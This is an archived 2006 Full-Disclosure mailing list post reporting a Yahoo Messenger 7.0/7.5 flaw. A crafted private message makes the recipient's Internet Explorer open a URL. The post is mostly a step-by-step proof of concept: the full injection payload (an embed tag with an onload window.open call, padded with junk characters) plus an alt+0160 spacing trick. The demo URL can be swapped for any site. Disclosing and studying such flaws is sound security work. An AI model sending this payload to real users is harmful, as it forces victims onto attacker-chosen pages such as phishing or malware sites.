[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Yahoo messenger serious bug

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Yahoo messenger serious bug
From: Ivan Ivan <ivancool2003@xxxxxxxxxxxx>
Date: Fri, 28 Jul 2006 12:11:17 +0000 (GMT)

Hi, 
I found another vulnerability in yahoo messenger that
if you receive a Private message with this string
"helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
 (without quotes) Yahoo messenger open in this case
google.com in the internet explorer of the remote
victim.

Yahoo messenger bug proof of concept:

1. Open messenger and log it.

2. Open a yahoo chat third party like yahelite through
Ymsgr protocol and log it with another account.

3. Send a Pm to the messenger account with this
string: s: helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(

4. The remote user will open www.google.com (you can
change)

Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a space 

s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(

Tested in yahoo messenger 7.0/7.5


Regards.


        
        
                
__________________________________________________
Preguntá. Respondé. Descubrí.
Todo lo que querías saber, y lo que ni imaginabas,
está en Yahoo! Respuestas (Beta).
¡Probalo ya! 
http://www.yahoo.com.ar/respuestas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Yahoo messenger serious bug
  - From: John Dietz
- Re: [Full-disclosure] Yahoo messenger serious bug
  - From: Morning Wood

Prev by Date: [Full-disclosure] [SECURITY] [DSA 1129-1] New osiris packages fix arbitrary code execution
Next by Date: Re: [Full-disclosure] Securityfocus fall for n3td3v agenda to show up the security company
Previous by thread: [Full-disclosure] [SECURITY] [DSA 1129-1] New osiris packages fix arbitrary code execution
Next by thread: Re: [Full-disclosure] Yahoo messenger serious bug
Index(es):
- Date
- Thread